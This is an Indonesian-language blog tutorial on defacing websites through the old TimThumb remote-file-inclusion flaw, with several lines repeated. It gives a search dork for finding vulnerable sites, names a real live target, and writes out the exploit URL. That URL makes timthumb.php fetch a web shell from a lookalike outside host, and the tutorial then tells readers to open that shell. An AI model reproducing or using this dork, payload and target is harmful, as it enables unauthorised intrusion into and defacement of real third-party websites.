1. Internet lah boy yakali kaga pake internet :p
2. Dork :inurl:/timthumb.php site:vn
Atau bisa kalian lihat dork lain nya disini Dork Timthumb
3. Exploit : ?src=http://flickr.com.cof.jp/shell.php
3. Exploit : ?src=http://flickr.com.cof.jp/shell.php
Oke langsung saja..
- Disini saya mempunyai live target : http://eurovie.vn/timthumb.php
*oh ya ciri web yg vuln itu seperti ini,versi yg vuln itu dibawah 1.32 diatasnya ga bisa
- Jika sudah menemukan yg seperti itu kita langsung saja kita masuka exploit nya di belakang timthumb.php
*seperti ini :
http://eurovie.vn/timthumb.php?src=http://flickr.com.cof.jp/shell.php
- yaps akan keluar seperti ini.
- jika sudah seperti itu tinggal kita akses si shell nya. *cara meng akses shell nya ikuti saja perintah disitu
Mungkin cukup sekian tutorial kali ini
next bakal ada tutorial tutorial lainnya
Oke.... see you on the next tutorial
- Disini saya mempunyai live target : http://eurovie.vn/timthumb.php
*oh ya ciri web yg vuln itu seperti ini,versi yg vuln itu dibawah 1.32 diatasnya ga bisa
*seperti ini :
http://eurovie.vn/timthumb.php?src=http://flickr.com.cof.jp/shell.php
Mungkin cukup sekian tutorial kali ini
next bakal ada tutorial tutorial lainnya
Oke.... see you on the next tutorial
0 Response to "Cara Deface Metode Timthumb Exploit 1.x RCE"
Post a Comment